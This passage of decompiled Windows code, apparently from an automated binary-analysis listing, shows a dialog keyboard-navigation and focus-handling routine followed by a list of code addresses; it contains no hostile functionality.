                                                                                                                                  				intOrPtr _t249;
                                                                                                                                  				signed int _t251;
                                                                                                                                  				signed int _t254;
                                                                                                                                  				signed int _t255;
                                                                                                                                  				signed int _t256;
                                                                                                                                  				signed int _t257;
                                                                                                                                  				signed int _t258;
                                                                                                                                  				void* _t260;
                                                                                                                                  				void* _t262;
                                                                                                                                  
                                                                                                                                  				_t232 = __ecx;
                                                                                                                                  				_t260 = _t262;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				_push(__ebx);
                                                                                                                                  				_push(__esi);
                                                                                                                                  				_push(__edi);
                                                                                                                                  				_t139 = E1002A5D5(_a4, _a8);
                                                                                                                                  				_t238 = _t139;
                                                                                                                                  				if(_t139 == 0) {
                                                                                                                                  					_t232 = _a4;
                                                                                                                                  					_t231 = E100199B2(_a4);
                                                                                                                                  					if(_t231 != 0) {
                                                                                                                                  						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                                                                                                  						_a8 = _t221;
                                                                                                                                  						if(_t221 != 0) {
                                                                                                                                  							while(1) {
                                                                                                                                  								_t9 = _t231 + 0x40; // 0x40
                                                                                                                                  								_t232 = _t9;
                                                                                                                                  								_t258 =  *(E10017B95( &_a8));
                                                                                                                                  								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                                                                                                  								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                                                                                                  									if(_a8 != 0) {
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								goto L10;
                                                                                                                                  							}
                                                                                                                                  							_t238 = _t258;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				L10:
                                                                                                                                  				_t247 = 0;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t238 = E1002A627(_t232, _a4, _t238, _a12);
                                                                                                                                  					if(_t238 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t142 = E1002A0D2(_t238);
                                                                                                                                  					_pop(_t232);
                                                                                                                                  					if(_t142 == 0) {
                                                                                                                                  						L14:
                                                                                                                                  						if(_t238 == 0) {
                                                                                                                                  							L21:
                                                                                                                                  							__eflags =  *(_t238 + 4);
                                                                                                                                  							if( *(_t238 + 4) == 0) {
                                                                                                                                  								E100201F1(_t232);
                                                                                                                                  								asm("int3");
                                                                                                                                  								_push(0x28);
                                                                                                                                  								E10030D5A(E10044D1A, 0, _t238, _t247);
                                                                                                                                  								_t146 = _a4;
                                                                                                                                  								__eflags = _t146;
                                                                                                                                  								if(_t146 != 0) {
                                                                                                                                  									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                                                                                                  								} else {
                                                                                                                                  									_v48 = _v48 & _t146;
                                                                                                                                  								}
                                                                                                                                  								_t240 = _a8;
                                                                                                                                  								_t249 = _t240->message;
                                                                                                                                  								_v32 = _t249;
                                                                                                                                  								_v52 = GetFocus();
                                                                                                                                  								_t149 = E1001B042(0, _t260, _t148);
                                                                                                                                  								_t229 = 0x100;
                                                                                                                                  								__eflags = _t249 - 0x100;
                                                                                                                                  								_v24 = _t149;
                                                                                                                                  								if(_t249 < 0x100) {
                                                                                                                                  									L34:
                                                                                                                                  									__eflags = _t249 + 0xfffffe00 - 9;
                                                                                                                                  									if(_t249 + 0xfffffe00 > 9) {
                                                                                                                                  										goto L56;
                                                                                                                                  									} else {
                                                                                                                                  										goto L35;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t249 - 0x109;
                                                                                                                                  									if(_t249 <= 0x109) {
                                                                                                                                  										L35:
                                                                                                                                  										__eflags = _t149;
                                                                                                                                  										if(_t149 == 0) {
                                                                                                                                  											L56:
                                                                                                                                  											_t251 = 0;
                                                                                                                                  											_v28 = 0;
                                                                                                                                  											_t150 = E1001B042(_t229, _t260,  *_t240);
                                                                                                                                  											_v44 = _v44 & 0;
                                                                                                                                  											_v36 = _t150;
                                                                                                                                  											_t152 = _v32 - _t229;
                                                                                                                                  											__eflags = _t152;
                                                                                                                                  											_v40 = 2;
                                                                                                                                  											if(_t152 == 0) {
                                                                                                                                  												_t153 = E1002A085(_v36, _t240);
                                                                                                                                  												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                                  												__eflags = _t232 - 0x1b;
                                                                                                                                  												if(__eflags > 0) {
                                                                                                                                  													__eflags = _t232 - 0x25;
                                                                                                                                  													if(_t232 < 0x25) {
                                                                                                                                  														goto L75;
                                                                                                                                  													} else {
                                                                                                                                  														__eflags = _t232 - 0x26;
                                                                                                                                  														if(_t232 <= 0x26) {
                                                                                                                                  															_v44 = 1;
                                                                                                                                  															goto L110;
                                                                                                                                  														} else {
                                                                                                                                  															__eflags = _t232 - 0x28;
                                                                                                                                  															if(_t232 <= 0x28) {
                                                                                                                                  																L110:
                                                                                                                                  																_t171 = E1002A085(_v24, _t240);
                                                                                                                                  																__eflags = _t171 & 0x00000001;
                                                                                                                                  																if((_t171 & 0x00000001) != 0) {
                                                                                                                                  																	goto L75;
                                                                                                                                  																} else {
                                                                                                                                  																	__eflags = _v44;
                                                                                                                                  																	_t232 = _a4;
                                                                                                                                  																	_push(0);
                                                                                                                                  																	if(_v44 == 0) {
                                                                                                                                  																		_t172 = E1001E706(_t232);
                                                                                                                                  																	} else {
                                                                                                                                  																		_t172 = E1001E6B8(_t232);
                                                                                                                                  																	}
                                                                                                                                  																	_t254 = _t172;
                                                                                                                                  																	__eflags = _t254;
                                                                                                                                  																	if(_t254 == 0) {
                                                                                                                                  																		goto L75;
                                                                                                                                  																	} else {
                                                                                                                                  																		__eflags =  *(_t254 + 8);
                                                                                                                                  																		if( *(_t254 + 8) != 0) {
                                                                                                                                  																			_t232 = _a4;
                                                                                                                                  																			E1001E262(_a4, _t254);
                                                                                                                                  																		}
                                                                                                                                  																		__eflags =  *(_t254 + 4);
                                                                                                                                  																		if( *(_t254 + 4) == 0) {
                                                                                                                                  																			_t173 =  *_t254;
                                                                                                                                  																			__eflags = _t173;
                                                                                                                                  																			if(_t173 == 0) {
                                                                                                                                  																				_t232 = _a4;
                                                                                                                                  																				_t174 = E1002A143(_a4, _v24, _v44);
                                                                                                                                  																			} else {
                                                                                                                                  																				_t174 = E1001B042(_t229, _t260, _t173);
                                                                                                                                  																			}
                                                                                                                                  																			_t242 = _t174;
                                                                                                                                  																			__eflags = _t242;
                                                                                                                                  																			if(_t242 == 0) {
                                                                                                                                  																				goto L75;
                                                                                                                                  																			} else {
                                                                                                                                  																				_t229 = 0;
                                                                                                                                  																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                                                                                                  																				E1002A17D(_t242);
                                                                                                                                  																				__eflags =  *(_t254 + 8);
                                                                                                                                  																				if( *(_t254 + 8) != 0) {
                                                                                                                                  																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                                                                                                  																				}
                                                                                                                                  																				goto L125;
                                                                                                                                  																			}
                                                                                                                                  																		} else {
                                                                                                                                  																			_t232 =  *(_t254 + 4);
                                                                                                                                  																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                                                                                                  																			goto L125;
                                                                                                                                  																		}
                                                                                                                                  																	}
                                                                                                                                  																}
                                                                                                                                  															} else {
                                                                                                                                  																__eflags = _t232 - 0x2b;
                                                                                                                                  																if(_t232 != 0x2b) {
                                                                                                                                  																	goto L75;
                                                                                                                                  																} else {
                                                                                                                                  																	goto L97;
                                                                                                                                  																}
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  													goto L126;
                                                                                                                                  												} else {
                                                                                                                                  													if(__eflags == 0) {
                                                                                                                                  														L103:
                                                                                                                                  														_t243 = 0;
                                                                                                                                  														__eflags = 0;
                                                                                                                                  														goto L104;
                                                                                                                                  													} else {
                                                                                                                                  														__eflags = _t232 - 3;
                                                                                                                                  														if(_t232 == 3) {
                                                                                                                                  															goto L103;
                                                                                                                                  														} else {
                                                                                                                                  															__eflags = _t232 - 9;
                                                                                                                                  															if(_t232 == 9) {
                                                                                                                                  																__eflags = _t153 & 0x00000002;
                                                                                                                                  																if((_t153 & 0x00000002) != 0) {
                                                                                                                                  																	goto L75;
                                                                                                                                  																} else {
                                                                                                                                  																	_t188 = GetKeyState(0x10);
                                                                                                                                  																	_t255 = _a4;
                                                                                                                                  																	__eflags = _t188;
                                                                                                                                  																	_t229 = 0 | _t188 < 0x00000000;
                                                                                                                                  																	_t232 = _t255;
                                                                                                                                  																	_t189 = E1001E11F(_t255, 0, _t188 < 0);
                                                                                                                                  																	__eflags = _t189;
                                                                                                                                  																	if(_t189 == 0) {
                                                                                                                                  																		goto L75;
                                                                                                                                  																	} else {
                                                                                                                                  																		__eflags =  *(_t189 + 4);
                                                                                                                                  																		if( *(_t189 + 4) == 0) {
                                                                                                                                  																			_t190 =  *_t189;
                                                                                                                                  																			__eflags = _t190;
                                                                                                                                  																			if(_t190 == 0) {
                                                                                                                                  																				_t232 = _t255;
                                                                                                                                  																				_t191 = E10016D48(_t255, _v36, _t229);
                                                                                                                                  																			} else {
                                                                                                                                  																				_t191 = E1001B042(_t229, _t260, _t190);
                                                                                                                                  																			}
                                                                                                                                  																			_t244 = _t191;
                                                                                                                                  																			__eflags = _t244;
                                                                                                                                  																			if(_t244 != 0) {
                                                                                                                                  																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                                                                                                  																				E1002A17D(_t244);
                                                                                                                                  																				E1002A347(_t229, _t232, _t260, _v24, _t244);
                                                                                                                                  																				_pop(_t232);
                                                                                                                                  																			}
                                                                                                                                  																		} else {
                                                                                                                                  																			_t195 =  *(_t189 + 4);
                                                                                                                                  																			_t232 = _t195;
                                                                                                                                  																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                                                                                                  																		}
                                                                                                                                  																		goto L125;
                                                                                                                                  																	}
                                                                                                                                  																}
                                                                                                                                  																goto L126;
                                                                                                                                  															} else {
                                                                                                                                  																__eflags = _t232 - 0xd;
                                                                                                                                  																if(_t232 == 0xd) {
                                                                                                                                  																	L97:
                                                                                                                                  																	__eflags = _t153 & 0x00000004;
                                                                                                                                  																	if((_t153 & 0x00000004) != 0) {
                                                                                                                                  																		goto L75;
                                                                                                                                  																	} else {
                                                                                                                                  																		_t182 = E1002A122(_v24);
                                                                                                                                  																		__eflags = _t182 & 0x00000010;
                                                                                                                                  																		_pop(_t232);
                                                                                                                                  																		if((_t182 & 0x00000010) == 0) {
                                                                                                                                  																			_t183 = E1002A4C8(_a4);
                                                                                                                                  																		} else {
                                                                                                                                  																			_t251 = _v24;
                                                                                                                                  																			_t232 = _t251;
                                                                                                                                  																			_t183 = E1001DE35(_t251);
                                                                                                                                  																		}
                                                                                                                                  																		_t243 = 0;
                                                                                                                                  																		__eflags = _t251;
                                                                                                                                  																		_v40 = _t183;
                                                                                                                                  																		if(_t251 != 0) {
                                                                                                                                  																			L105:
                                                                                                                                  																			_t232 = _t251;
                                                                                                                                  																			_t184 = E1001DEAF(_t251);
                                                                                                                                  																			__eflags = _t184;
                                                                                                                                  																			if(_t184 != 0) {
                                                                                                                                  																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                                                                                                  																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                                                                                                  																					goto L75;
                                                                                                                                  																				} else {
                                                                                                                                  																					_push(_t243);
                                                                                                                                  																					_push(_t243);
                                                                                                                                  																					_push(_t243);
                                                                                                                                  																					_push(1);
                                                                                                                                  																					_push(0xfffffdd9);
                                                                                                                                  																					_push(_t251);
                                                                                                                                  																					_v8 = _t243;
                                                                                                                                  																					E1001DF0C();
                                                                                                                                  																					_v8 = _v8 | 0xffffffff;
                                                                                                                                  																					goto L125;
                                                                                                                                  																				}
                                                                                                                                  																			} else {
                                                                                                                                  																				MessageBeep(_t243);
                                                                                                                                  																				goto L75;
                                                                                                                                  																			}
                                                                                                                                  																		} else {
                                                                                                                                  																			L104:
                                                                                                                                  																			_t251 = E1002A3C2(_a4, _v40);
                                                                                                                                  																			__eflags = _t251 - _t243;
                                                                                                                                  																			if(_t251 == _t243) {
                                                                                                                                  																				goto L75;
                                                                                                                                  																			} else {
                                                                                                                                  																				goto L105;
                                                                                                                                  																			}
                                                                                                                                  																		}
                                                                                                                                  																	}
                                                                                                                                  																	goto L126;
                                                                                                                                  																} else {
                                                                                                                                  																	goto L75;
                                                                                                                                  																}
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  												goto L79;
                                                                                                                                  											} else {
                                                                                                                                  												_t198 = _t152;
                                                                                                                                  												__eflags = _t198;
                                                                                                                                  												if(_t198 == 0) {
                                                                                                                                  													L62:
                                                                                                                                  													_t199 = E1002A085(_v36, _t240);
                                                                                                                                  													__eflags = _v32 - 0x102;
                                                                                                                                  													if(_v32 != 0x102) {
                                                                                                                                  														L64:
                                                                                                                                  														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                                  														__eflags = _t232 - 9;
                                                                                                                                  														if(_t232 != 9) {
                                                                                                                                  															L66:
                                                                                                                                  															__eflags = _t232 - 0x20;
                                                                                                                                  															if(__eflags == 0) {
                                                                                                                                  																goto L54;
                                                                                                                                  															} else {
                                                                                                                                  																_push(_t240);
                                                                                                                                  																_t200 = E1002A778(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                                                                                                  																__eflags = _t200;
                                                                                                                                  																if(_t200 == 0) {
                                                                                                                                  																	goto L75;
                                                                                                                                  																} else {
                                                                                                                                  																	_t201 =  *(_t200 + 4);
                                                                                                                                  																	__eflags = _t201;
                                                                                                                                  																	if(_t201 == 0) {
                                                                                                                                  																		goto L75;
                                                                                                                                  																	} else {
                                                                                                                                  																		_t232 = _t201;
                                                                                                                                  																		E100246E1(_t201, _t240);
                                                                                                                                  																		L125:
                                                                                                                                  																		_v28 = 1;
                                                                                                                                  																	}
                                                                                                                                  																}
                                                                                                                                  																goto L79;
                                                                                                                                  															}
                                                                                                                                  														} else {
                                                                                                                                  															__eflags = _t199 & 0x00000002;
                                                                                                                                  															if((_t199 & 0x00000002) != 0) {
                                                                                                                                  																goto L75;
                                                                                                                                  															} else {
                                                                                                                                  																goto L66;
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													} else {
                                                                                                                                  														__eflags = _t199 & 0x00000084;
                                                                                                                                  														if((_t199 & 0x00000084) != 0) {
                                                                                                                                  															goto L75;
                                                                                                                                  														} else {
                                                                                                                                  															goto L64;
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												} else {
                                                                                                                                  													__eflags = _t198 != 4;
                                                                                                                                  													if(_t198 != 4) {
                                                                                                                                  														L75:
                                                                                                                                  														_t154 = _a4;
                                                                                                                                  														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                                                                                                  														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                                                                                                  															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                                                                                                  															__eflags = _t165;
                                                                                                                                  															_v28 = _t165;
                                                                                                                                  															if(_t165 != 0) {
                                                                                                                                  																_t167 = E1001B042(_t229, _t260, GetFocus());
                                                                                                                                  																__eflags = _t167 - _v24;
                                                                                                                                  																if(_t167 != _v24) {
                                                                                                                                  																	E1002A2DA(_t232, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                                  																	_pop(_t232);
                                                                                                                                  																}
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  														L79:
                                                                                                                                  														_t155 = IsWindow(_v52);
                                                                                                                                  														__eflags = _t155;
                                                                                                                                  														if(_t155 != 0) {
                                                                                                                                  															E1002A347(_t229, _t232, _t260, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                                  															_t161 = IsWindow(_v48);
                                                                                                                                  															__eflags = _t161;
                                                                                                                                  															if(_t161 != 0) {
                                                                                                                                  																E1002A4F5(_a4, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  														_t156 = _v28;
                                                                                                                                  													} else {
                                                                                                                                  														__eflags = _v24;
                                                                                                                                  														if(_v24 != 0) {
                                                                                                                                  															L61:
                                                                                                                                  															__eflags =  *(_t240 + 8) - 0x20;
                                                                                                                                  															if( *(_t240 + 8) == 0x20) {
                                                                                                                                  																goto L75;
                                                                                                                                  															} else {
                                                                                                                                  																goto L62;
                                                                                                                                  															}
                                                                                                                                  														} else {
                                                                                                                                  															_t204 = GetKeyState(0x12);
                                                                                                                                  															__eflags = _t204;
                                                                                                                                  															if(_t204 >= 0) {
                                                                                                                                  																goto L75;
                                                                                                                                  															} else {
                                                                                                                                  																goto L61;
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										} else {
                                                                                                                                  											_t256 = _t149;
                                                                                                                                  											while(1) {
                                                                                                                                  												__eflags =  *(_t256 + 0x50);
                                                                                                                                  												if( *(_t256 + 0x50) != 0) {
                                                                                                                                  													break;
                                                                                                                                  												}
                                                                                                                                  												_t211 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                                  												__eflags = _t211 - _a4;
                                                                                                                                  												if(_t211 != _a4) {
                                                                                                                                  													_t256 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                                  													__eflags = _t256;
                                                                                                                                  													if(_t256 != 0) {
                                                                                                                                  														continue;
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  												break;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _t256;
                                                                                                                                  											if(_t256 == 0) {
                                                                                                                                  												L45:
                                                                                                                                  												__eflags = _v32 - 0x101;
                                                                                                                                  												if(_v32 == 0x101) {
                                                                                                                                  													L48:
                                                                                                                                  													__eflags = _t256;
                                                                                                                                  													if(_t256 == 0) {
                                                                                                                                  														goto L55;
                                                                                                                                  													} else {
                                                                                                                                  														_t257 =  *(_t256 + 0x50);
                                                                                                                                  														__eflags = _t257;
                                                                                                                                  														if(_t257 == 0) {
                                                                                                                                  															goto L55;
                                                                                                                                  														} else {
                                                                                                                                  															_t206 = _a8->wParam & 0x0000ffff;
                                                                                                                                  															__eflags = _t206 - 0xd;
                                                                                                                                  															if(_t206 != 0xd) {
                                                                                                                                  																L52:
                                                                                                                                  																__eflags = _t206 - 0x1b;
                                                                                                                                  																if(_t206 != 0x1b) {
                                                                                                                                  																	goto L55;
                                                                                                                                  																} else {
                                                                                                                                  																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                                                                                                  																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                                                                                                  																		goto L55;
                                                                                                                                  																	} else {
                                                                                                                                  																		goto L54;
                                                                                                                                  																	}
                                                                                                                                  																}
                                                                                                                                  															} else {
                                                                                                                                  																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                                                                                                  																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                                                                                                  																	L54:
                                                                                                                                  																	_t156 = 0;
                                                                                                                                  																} else {
                                                                                                                                  																	goto L52;
                                                                                                                                  																}
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												} else {
                                                                                                                                  													__eflags = _v32 - _t229;
                                                                                                                                  													if(_v32 == _t229) {
                                                                                                                                  														goto L48;
                                                                                                                                  													} else {
                                                                                                                                  														__eflags = _v32 - 0x102;
                                                                                                                                  														if(_v32 != 0x102) {
                                                                                                                                  															L55:
                                                                                                                                  															_t240 = _a8;
                                                                                                                                  															goto L56;
                                                                                                                                  														} else {
                                                                                                                                  															goto L48;
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											} else {
                                                                                                                                  												_t207 =  *(_t256 + 0x50);
                                                                                                                                  												__eflags = _t207;
                                                                                                                                  												if(_t207 == 0) {
                                                                                                                                  													goto L45;
                                                                                                                                  												} else {
                                                                                                                                  													__eflags =  *(_t207 + 0x58);
                                                                                                                                  													if( *(_t207 + 0x58) == 0) {
                                                                                                                                  														goto L45;
                                                                                                                                  													} else {
                                                                                                                                  														_t208 =  *(_t207 + 0x58);
                                                                                                                                  														_t232 =  *_t208;
                                                                                                                                  														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                                                                                                  														__eflags = _t209;
                                                                                                                                  														if(_t209 != 0) {
                                                                                                                                  															goto L45;
                                                                                                                                  														} else {
                                                                                                                                  															_t156 = _t209 + 1;
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										goto L34;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								return E10030DFF(_t156);
                                                                                                                                  							} else {
                                                                                                                                  								_t232 =  *(_t238 + 4);
                                                                                                                                  								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                                                                                                  								__eflags = _t215 & 0x08000000;
                                                                                                                                  								if((_t215 & 0x08000000) == 0) {
                                                                                                                                  									goto L20;
                                                                                                                                  								} else {
                                                                                                                                  									goto L23;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							_t216 =  *(_t238 + 4);
                                                                                                                                  							if(_t216 == 0) {
                                                                                                                                  								_t217 =  *_t238;
                                                                                                                                  							} else {
                                                                                                                                  								_t217 =  *(_t216 + 0x24);
                                                                                                                                  							}
                                                                                                                                  							if(_t217 == 0) {
                                                                                                                                  								goto L21;
                                                                                                                                  							} else {
                                                                                                                                  								if(IsWindowEnabled(_t217) == 0) {
                                                                                                                                  									L23:
                                                                                                                                  									__eflags = _t238 - _v8;
                                                                                                                                  									if(_t238 == _v8) {
                                                                                                                                  										break;
                                                                                                                                  									} else {
                                                                                                                                  										__eflags = _v8;
                                                                                                                                  										if(_v8 == 0) {
                                                                                                                                  											_v8 = _t238;
                                                                                                                                  										}
                                                                                                                                  										_t247 = _t247 + 1;
                                                                                                                                  										__eflags = _t247 - 0x200;
                                                                                                                                  										if(_t247 < 0x200) {
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											break;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									L20:
                                                                                                                                  									_t141 = _t238;
                                                                                                                                  									L28:
                                                                                                                                  									return _t141;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t232 = _a4;
                                                                                                                                  						_t238 = E1001E11F(_a4, _t238, 0);
                                                                                                                                  						if(_t238 == 0) {
                                                                                                                                  							break;
                                                                                                                                  						} else {
                                                                                                                                  							goto L14;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L126:
                                                                                                                                  				}
                                                                                                                                  				_t141 = 0;
                                                                                                                                  				__eflags = 0;
                                                                                                                                  				goto L28;
                                                                                                                                  			}
                                                                                                                                  0x1002ab42
                                                                                                                                  0x1002ab44
                                                                                                                                  0x1002ab4d
                                                                                                                                  0x1002ab52
                                                                                                                                  0x1002ab5b
                                                                                                                                  0x1002ab61
                                                                                                                                  0x1002ab61
                                                                                                                                  0x1002ab14
                                                                                                                                  0x1002ab14
                                                                                                                                  0x1002ab1a
                                                                                                                                  0x1002ab1c
                                                                                                                                  0x1002ab1c
                                                                                                                                  0x00000000
                                                                                                                                  0x1002ab12
                                                                                                                                  0x1002ab08
                                                                                                                                  0x00000000
                                                                                                                                  0x1002aa48
                                                                                                                                  0x1002aa48
                                                                                                                                  0x1002aa4b
                                                                                                                                  0x1002ab8b
                                                                                                                                  0x1002ab8b
                                                                                                                                  0x1002ab8d
                                                                                                                                  0x00000000
                                                                                                                                  0x1002ab93
                                                                                                                                  0x1002ab96
                                                                                                                                  0x1002ab9b
                                                                                                                                  0x1002ab9d
                                                                                                                                  0x1002ab9e
                                                                                                                                  0x1002abaf
                                                                                                                                  0x1002aba0
                                                                                                                                  0x1002aba0
                                                                                                                                  0x1002aba3
                                                                                                                                  0x1002aba5
                                                                                                                                  0x1002aba5
                                                                                                                                  0x1002abb4
                                                                                                                                  0x1002abb6
                                                                                                                                  0x1002abb8
                                                                                                                                  0x1002abbb
                                                                                                                                  0x1002abd6
                                                                                                                                  0x1002abd6
                                                                                                                                  0x1002abd8
                                                                                                                                  0x1002abdd
                                                                                                                                  0x1002abdf
                                                                                                                                  0x1002abed
                                                                                                                                  0x1002abf0
                                                                                                                                  0x00000000
                                                                                                                                  0x1002abf6
                                                                                                                                  0x1002abf6
                                                                                                                                  0x1002abf7
                                                                                                                                  0x1002abf8
                                                                                                                                  0x1002abf9
                                                                                                                                  0x1002abfb
                                                                                                                                  0x1002ac00
                                                                                                                                  0x1002ac01
                                                                                                                                  0x1002ac04
                                                                                                                                  0x1002ac0c
                                                                                                                                  0x00000000
                                                                                                                                  0x1002ac0c
                                                                                                                                  0x1002abe1
                                                                                                                                  0x1002abe2
                                                                                                                                  0x00000000
                                                                                                                                  0x1002abe2
                                                                                                                                  0x1002abbd
                                                                                                                                  0x1002abc1
                                                                                                                                  0x1002abcc
                                                                                                                                  0x1002abce
                                                                                                                                  0x1002abd0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002abd0
                                                                                                                                  0x1002abbb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002aa4b
                                                                                                                                  0x1002aa42
                                                                                                                                  0x1002aa39
                                                                                                                                  0x1002aa30
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a99a
                                                                                                                                  0x1002a99b
                                                                                                                                  0x1002a99b
                                                                                                                                  0x1002a99c
                                                                                                                                  0x1002a9c8
                                                                                                                                  0x1002a9cc
                                                                                                                                  0x1002a9d1
                                                                                                                                  0x1002a9d8
                                                                                                                                  0x1002a9de
                                                                                                                                  0x1002a9de
                                                                                                                                  0x1002a9e2
                                                                                                                                  0x1002a9e6
                                                                                                                                  0x1002a9ec
                                                                                                                                  0x1002a9ec
                                                                                                                                  0x1002a9f0
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a9f6
                                                                                                                                  0x1002a9f6
                                                                                                                                  0x1002a9fd
                                                                                                                                  0x1002aa02
                                                                                                                                  0x1002aa04
                                                                                                                                  0x00000000
                                                                                                                                  0x1002aa06
                                                                                                                                  0x1002aa06
                                                                                                                                  0x1002aa09
                                                                                                                                  0x1002aa0b
                                                                                                                                  0x00000000
                                                                                                                                  0x1002aa0d
                                                                                                                                  0x1002aa0e
                                                                                                                                  0x1002aa10
                                                                                                                                  0x1002accc
                                                                                                                                  0x1002accc
                                                                                                                                  0x1002accc
                                                                                                                                  0x1002aa0b
                                                                                                                                  0x00000000
                                                                                                                                  0x1002aa04
                                                                                                                                  0x1002a9e8
                                                                                                                                  0x1002a9e8
                                                                                                                                  0x1002a9ea
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a9ea
                                                                                                                                  0x1002a9da
                                                                                                                                  0x1002a9da
                                                                                                                                  0x1002a9dc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a9dc
                                                                                                                                  0x1002a99e
                                                                                                                                  0x1002a99e
                                                                                                                                  0x1002a9a1
                                                                                                                                  0x1002aa51
                                                                                                                                  0x1002aa51
                                                                                                                                  0x1002aa54
                                                                                                                                  0x1002aa5a
                                                                                                                                  0x1002aa62
                                                                                                                                  0x1002aa68
                                                                                                                                  0x1002aa6a
                                                                                                                                  0x1002aa6d
                                                                                                                                  0x1002aa78
                                                                                                                                  0x1002aa7d
                                                                                                                                  0x1002aa80
                                                                                                                                  0x1002aa8b
                                                                                                                                  0x1002aa90
                                                                                                                                  0x1002aa90
                                                                                                                                  0x1002aa80
                                                                                                                                  0x1002aa6d
                                                                                                                                  0x1002aa91
                                                                                                                                  0x1002aa9a
                                                                                                                                  0x1002aa9c
                                                                                                                                  0x1002aa9e
                                                                                                                                  0x1002aab2
                                                                                                                                  0x1002aabc
                                                                                                                                  0x1002aabe
                                                                                                                                  0x1002aac0
                                                                                                                                  0x1002aad1
                                                                                                                                  0x1002aad1
                                                                                                                                  0x1002aac0
                                                                                                                                  0x1002aad6
                                                                                                                                  0x1002a9a7
                                                                                                                                  0x1002a9a7
                                                                                                                                  0x1002a9aa
                                                                                                                                  0x1002a9bd
                                                                                                                                  0x1002a9bd
                                                                                                                                  0x1002a9c2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a9ac
                                                                                                                                  0x1002a9ae
                                                                                                                                  0x1002a9b4
                                                                                                                                  0x1002a9b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a9b7
                                                                                                                                  0x1002a9aa
                                                                                                                                  0x1002a9a1
                                                                                                                                  0x1002a99c
                                                                                                                                  0x1002a8cf
